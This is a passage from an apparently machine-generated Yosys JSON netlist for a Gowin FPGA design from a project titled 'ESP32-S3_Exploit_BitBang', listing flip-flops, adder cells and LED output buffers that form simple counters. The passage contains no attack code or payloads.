"c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 42 ], + "CLK": [ 13 ], + "D": [ 110 ], + "Q": [ 111 ] + } + }, + "instruction_counter_DFFE_Q_8_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 112 ], + "COUT": [ 109 ], + "I0": [ 27 ], + "I1": [ 111 ], + "I3": [ 28 ], + "SUM": [ 110 ] + } + }, + "instruction_counter_DFFE_Q_9": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 42 ], + "CLK": [ 13 ], + "D": [ 113 ], + "Q": [ 114 ] + } + }, + "instruction_counter_DFFE_Q_9_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 50 ], + "COUT": [ 112 ], + "I0": [ 27 ], + "I1": [ 114 ], + "I3": [ 28 ], + "SUM": [ 113 ] + } + }, + "instruction_counter_DFFE_Q_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 79 ], + "COUT": [ 115 ], + "I0": [ 27 ], + "I1": [ 44 ], + "I3": [ 28 ], + "SUM": [ 43 ] + } + }, + "ledCounter_DFFRE_Q": { + "hide_name": 0, + "type": "DFFRE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:43.8-43.68" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output", + "RESET": "input" + }, + "connections": { + "CE": [ 116 ], + "CLK": [ 13 ], + "D": [ 117 ], + "Q": [ 118 ], + "RESET": [ 119 ] + } + }, + "ledCounter_DFFRE_Q_1": { + "hide_name": 0, + "type": "DFFRE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:43.8-43.68" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output", + "RESET": "input" + }, + "connections": { + "CE": [ 116 ], + "CLK": [ 13 ], + "D": [ 120 ], + "Q": [ 121 ], + "RESET": [ 119 ] + } + }, + "ledCounter_DFFRE_Q_1_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:53.26-53.40|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 122 ], + "COUT": [ 123 ], + "I0": [ 27 ], + "I1": [ 121 ], + "I3": [ 28 ], + "SUM": [ 120 ] + } + }, + "ledCounter_DFFRE_Q_2": { + "hide_name": 0, + "type": "DFFRE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:43.8-43.68" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output", + "RESET": "input" + }, + "connections": { + "CE": [ 116 ], + "CLK": [ 13 ], + "D": [ 124 ], + "Q": [ 125 ], + "RESET": [ 119 ] + } + }, + "ledCounter_DFFRE_Q_2_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:53.26-53.40|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 126 ], + "COUT": [ 122 ], + "I0": [ 27 ], + "I1": [ 125 ], + "I3": [ 28 ], + "SUM": [ 124 ] + } + }, + "ledCounter_DFFRE_Q_3": { + "hide_name": 0, + "type": "DFFRE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:43.8-43.68" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output", + "RESET": "input" + }, + "connections": { + "CE": [ 116 ], + "CLK": [ 13 ], + "D": [ 127 ], + "Q": [ 128 ], + "RESET": [ 119 ] + } + }, + "ledCounter_DFFRE_Q_3_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:53.26-53.40|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 129 ], + "COUT": [ 126 ], + "I0": [ 27 ], + "I1": [ 128 ], + "I3": [ 28 ], + "SUM": [ 127 ] + } + }, + "ledCounter_DFFRE_Q_4": { + "hide_name": 0, + "type": "DFFRE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:43.8-43.68" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output", + "RESET": "input" + }, + "connections": { + "CE": [ 116 ], + "CLK": [ 13 ], + "D": [ 130 ], + "Q": [ 131 ], + "RESET": [ 119 ] + } + }, + "ledCounter_DFFRE_Q_4_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:53.26-53.40|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 132 ], + "COUT": [ 129 ], + "I0": [ 27 ], + "I1": [ 131 ], + "I3": [ 28 ], + "SUM": [ 130 ] + } + }, + "ledCounter_DFFRE_Q_4_D_ALU_SUM_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:53.26-53.40|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 27 ], + "COUT": [ 132 ], + "I0": [ 28 ], + "I1": [ 133 ], + "I3": [ 28 ], + "SUM": [ 134 ] + } + }, + "ledCounter_DFFRE_Q_5": { + "hide_name": 0, + "type": "DFFRE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:43.8-43.68" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output", + "RESET": "input" + }, + "connections": { + "CE": [ 116 ], + "CLK": [ 13 ], + "D": [ 135 ], + "Q": [ 133 ], + "RESET": [ 119 ] + } + }, + "ledCounter_DFFRE_Q_5_D_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "01" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:135.23-136.15" + }, + "port_directions": { + "F": "output", + "I0": "input" + }, + "connections": { + "F": [ 135 ], + "I0": [ 133 ] + } + }, + "ledCounter_DFFRE_Q_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:53.26-53.40|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 123 ], + "COUT": [ 136 ], + "I0": [ 27 ], + "I1": [ 118 ], + "I3": [ 28 ], + "SUM": [ 117 ] + } + }, + "led_OBUF_O": { + "hide_name": 0, + "type": "OBUF", + "parameters": { + }, + "attributes": { + "keep": "00000000000000000000000000000001" + }, + "port_directions": { + "I": "input", + "O": "output" + }, + "connections": { + "I": [ 118 ], + "O": [ 10 ] + } + }, + "led_OBUF_O_1": { + "hide_name": 0, + "type": "OBUF", + "parameters": { + }, + "attributes": { + "keep": "00000000000000000000000000000001" + }, + "port_directions": { + "I": "input", + "O": "output" + }, + "connections": { + "I": [ 121 ], + "O": [ 9 ] + } + }, + "led_OBUF_O_2": { + "hide_name": 0, + "type": "OBUF", + "parameters": { + }, + "attributes": { + "keep": "00000000000000000000000000000001" + }, + "port_directions": { + "I": "input", + "O": "output" + }, + "connections": { + "I": [ 125 ], + "O": [ 8 ] + } + }, + "led_OBUF_O_3": { + "hide_name": 0, + "type": "OBUF", + "parameters": { + }, + "attributes": { + "keep": "00000000000000000000000000000001" + }, + "port_directions": { + "I": "input", + "O": "output" + }, + "connections": { + "I": [ 128 ], + "O": [ 7 ] + } + }, + "led_OBUF_O_4": { + "hide_name": 0, + "type": "OBUF", + "parameters": { + }, + "attributes": { + "keep": "00000000000000000000000000000001" + }, + "port_directions": { + "I": "input", + "O": "output" + }, + "connections": { + "I": [ 131 ], + "O": [ 6 ] + } + }, + "led_OBUF_O_5": { + "hide_name": 0, + "type": "OBUF", + "parameters": { + }, + "attributes": { + "keep": "00000000000000000000000000000001" + }, + "port_directions": { + "I": "input", + "O": "output" + }, + "connections": { + "I": [ 133 ], + "O": [ 5 ] + } + }, + "led_run_DFFSE_Q": { + "hide_name": 0, + "type": "DFFSE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:67.8-67.66" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output", + "SET": "input" + }, + "connections": { + "CE": [ 42 ], + "CLK": [ 13 ], + "D": [ 137 ], + "Q": [ 138 ], + "SET": [ 27 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F": { + "hide_name": 0, + "type": "LUT3", + "parameters": { + "INIT": "11100010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:143.23-144.37" + }, + "port_directions": { + "F": "output", + "I0": "input", + "I1": "input", + "I2": "input" + }, + "connections": { + "F": [ 137 ], + "I0": [ 139 ], + "I1": [ 140 ], + "I2": [ 141 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 142 ], + "COUT": [ 139 ], + "I0": [ 27 ], + "I1": [ 44 ], + "I3": [ 27 ], + "SUM": [ 143 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 144 ], + "COUT": [ 142 ], + "I0": [ 27 ], + "I1": [ 46 ], + "I3": [ 27 ], + "SUM": [ 145 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 146 ], + "COUT": [ 144 ], + "I0": [ 27 ], + "I1": [ 81 ], + "I3": [ 27 ], + "SUM": [ 147 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 148 ], + "COUT": [ 146 ], + "I0": [ 27 ], + "I1": [ 96 ], + "I3": [ 27 ], + "SUM": [ 149 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 150 ], + "COUT": [ 148 ], + "I0": [ 27 ], + "I1": [ 99 ], + "I3": [ 27 ], + "SUM": [ 151 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 152 ], + "COUT": [ 150 ], + "I0": [ 27 ], + "I1": [ 102 ], + "I3": [ 27 ], + "SUM": [ 153 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 154 ], + "COUT": [ 152 ], + "I0": [ 27 ], + "I1": [ 105 ], + "I3": [ 27 ], + "SUM": [ 155 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 156 ], + "COUT": [ 154 ], + "I0": [ 27 ], + "I1": [ 108 ], + "I3": [ 27 ], + "SUM": [ 157 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 158 ], + "COUT": [ 156 ], + "I0": [ 27 ], + "I1": [ 111 ], + "I3": [ 27 ], + "SUM": [ 159 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 160 ], + "COUT": [ 158 ], + "I0": [ 27 ], + "I1": [ 114 ], + "I3": [ 27 ], + "SUM": [ 161 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 162 ], + "COUT": [ 160 ], + "I0": [ 27 ], + "I1": [ 48 ], + "I3": [ 27 ], + "SUM": [ 163 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 164 ], + "COUT": [ 162 ], + "I0": [ 27 ], + "I1": [ 52 ], + "I3": [ 27 ], + "SUM": [ 165 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 166 ], + "COUT": [ 164 ], + "I0": [ 27 ], + "I1": [ 55 ], + "I3": [ 27 ], + "SUM": [ 167 ] + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 168 ], + "COUT": [ 166 ], + "I0": [ 27 ], + "I1": [ 58 ], + "I3": [ 27 ], + "SUM": [ 169 ] + } + }, + 